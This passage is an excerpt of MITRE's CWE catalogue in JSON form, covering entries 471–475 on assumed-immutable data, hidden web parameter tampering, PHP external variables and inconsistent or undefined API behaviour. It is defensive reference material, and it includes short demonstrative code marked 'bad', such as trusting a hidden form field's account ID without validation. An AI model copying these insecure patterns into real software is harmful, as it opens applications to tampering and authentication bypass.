Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe Reflection","attr":{"@_Date":"2008-04-11"}},{"#text":"Use of Externally-Controlled Input to Select Classes or Code (aka \'Unsafe Reflection\')","attr":{"@_Date":"2009-05-27"}}]}},"471":{"attr":{"@_ID":"471","@_Name":"Modification of Assumed-Immutable Data (MAID)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly protect an assumed-immutable element from being modified by an attacker.","Extended_Description":"This occurs when a particular input is critical enough to the functioning of the application that it should not be modifiable at all, but it is. Certain resources are often assumed to be immutable when they are not, such as hidden form fields in web applications, cookies, and reverse DNS lookups.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Common data types that are attacked are environment variables, web application parameters, and HTTP headers."},{"Scope":"Integrity","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the code excerpt below, an array returned by a Java method is modified despite the fact that arrays are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String[] colors = car.getAllPossibleColors();colors[0] = \\"Red\\";","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1757","Description":"Relies on $PHP_SELF variable for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1757"},{"Reference":"CVE-2005-1905","Description":"Gain privileges by modifying assumed-immutable code addresses that are accessed by a driver.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1905"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Modification of Assumed-Immutable Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"Notes":{"Note":[{"#text":"MAID issues can be primary to many other weaknesses, and they are a major factor in languages that provide easy access to internal program constructs, such as PHP\'s register_globals and similar features. However, MAID issues can also be resultant from weaknesses that modify internal state; for example, a program might validate some data and store it in memory, but a buffer overflow could overwrite that validated data, leading to a change in program logic.","attr":{"@_Type":"Relationship"}},{"#text":"There are many examples where the MUTABILITY property is a major factor in a vulnerability.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationship_Notes, Theoretical_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"472":{"attr":{"@_ID":"472","@_Name":"External Control of Assumed-Immutable Web Parameter","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.","Extended_Description":{"xhtml:p":["If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input.","For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Assumed-Immutable Parameter Tampering"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Without appropriate protection mechanisms, the client can easily tamper with cookies and similar web data. Reliance on the cookies without detailed validation can lead to problems such as SQL injection. If you use cookie values for security related decisions on the server side, manipulating the cookies might lead to violations of security policies such as authentication bypassing, user impersonation and privilege escalation. In addition, storing sensitive data in the cookie without appropriate protection can also lead to disclosure of sensitive user data, especially data stored in persistent cookies."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String accountID = request.getParameter(\\"accountID\\");User user = getUserFromID(Long.parseLong(accountID));","xhtml:br":""}}},{"Intro_Text":"Hidden fields should not be trusted as secure parameters.","Body_Text":["An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring:","or even just \\"hidden\\". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"&lt;input type=\\"hidden\\""}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0108","Description":"Forum product allows spoofed messages of other users via hidden form fields for name and e-mail address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0108"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2000-0254","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0254"},{"Reference":"CVE-2000-0926","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0926"},{"Reference":"CVE-2000-0101","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0101"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0758","Description":"Allows admin access by modifying value of form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758"},{"Reference":"CVE-2002-1880","Description":"Read messages by modifying message ID parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1880"},{"Reference":"CVE-2000-1234","Description":"Send email to arbitrary users by modifying email parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1234"},{"Reference":"CVE-2005-1652","Description":"Authentication bypass by setting a parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1652"},{"Reference":"CVE-2005-1784","Description":"Product does not check authorization for configuration change admin script, leading to password theft via modified e-mail address field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1784"},{"Reference":"CVE-2005-2314","Description":"Logic error leads to password disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2314"},{"Reference":"CVE-2005-1682","Description":"Modification of message number parameter allows attackers to read other people\'s messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1682"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Web Parameter Tampering"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form&#xA;                  Fields.&#34; Page 75"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Embedding State in HTML and URLs&#34;, Page 1032"}}]},"Notes":{"Note":[{"#text":"This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion.","attr":{"@_Type":"Relationship"}},{"#text":"This is a technology-specific MAID problem.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Web Parameter Tampering","attr":{"@_Date":"2008-04-11"}}}},"473":{"attr":{"@_ID":"473","@_Name":"PHP External Variable Modification","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Requirements","Implementation"],"Description":"Carefully identify which variables can be controlled or influenced by an external user, and consider adopting a naming convention to emphasize when externally modifiable variables are being used. An application should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Do not allow your application to run with register_globals enabled. If you implement a register_globals emulator, be extremely careful of variable extraction, dynamic evaluation, and similar issues, since weaknesses in your emulation could allow external variable modification to take place even without register_globals."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0860","Description":"File upload allows arbitrary file read by setting hidden form variables to match internal variable names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0860"},{"Reference":"CVE-2001-0854","Description":"Mistakenly trusts $PHP_SELF variable to determine if include script was called by its parent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0854"},{"Reference":"CVE-2002-0764","Description":"PHP remote file inclusion by modified assumed-immutable variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0764"},{"Reference":"CVE-2001-1025","Description":"Modify key variable when calling scripts that don\'t load a library that initializes it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1025"},{"Reference":"CVE-2003-0754","Description":"Authentication bypass by modifying array used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0754"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP External Variable Modification"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"77"}}},"Notes":{"Note":{"#text":"This is a language-specific instance of Modification of Assumed-Immutable Data (MAID). This can be resultant from direct request (alternate path) issues. It can be primary to weaknesses such as PHP file inclusion, SQL injection, XSS, authentication bypass, and others.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"474":{"attr":{"@_ID":"474","@_Name":"Use of Function with Inconsistent Implementations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a function that has inconsistent implementations across operating systems and versions.","Extended_Description":{"xhtml:p":["The use of inconsistent implementations can cause changes in behavior when the code is ported or built under a different environment than the programmer expects, which can lead to security problems in some cases.","The implementation of many functions varies by platform, and at times, even by different versions of the same platform. Implementation differences can include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Slight differences in the way parameters are interpreted leading to inconsistent results.","Some implementations of the function carry significant security risks.","The function might not be defined on all platforms.","The function might change which return codes it can provide, or change the meaning of its return codes."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Requirements"],"Description":"Do not accept inconsistent behavior from the API specifications when the deviant behavior increase the risk level."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Inconsistent Implementations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Inconsistent Implementations","attr":{"@_Date":"2008-04-11"}}}},"475":{"attr":{"@_ID":"475","@_Name":"Undefined Behavior for Input to API","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The behavior of this function is undefined unless its control parameter is set to a specific value.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Undefined Behavior"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Linux Standard Base Specification 2.0.1 for libc places constraints on the arguments to some internal functions [21]. If the constraints are not met, the behavior of the functions is not defined. It is unusual for this function to be called directly. It is almost always invoked through a macro defined in a system header file, and the macro ensures that the following constraints are met: The value 1 must be passed to the third parameter (the version number) of the following file system function: __xmknod The value 2 must be passed to the third parameter (the group argument) of the following wide character string functions: __wcstod_internal __wcstof_internal __wcstol_internal __wcstold_internal __wcstoul_internal The value 3 must be passed as the first parameter (the version number) of the following file system functions: __xstat __lxstat __fxstat __xstat64 __lxstat64 __fxstat64","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Undefined Behavior","attr":{"@_Date":"2008-04-11"}}}},"476":{"attr":{"@_ID":"476","@_Name":"NULL Pointer 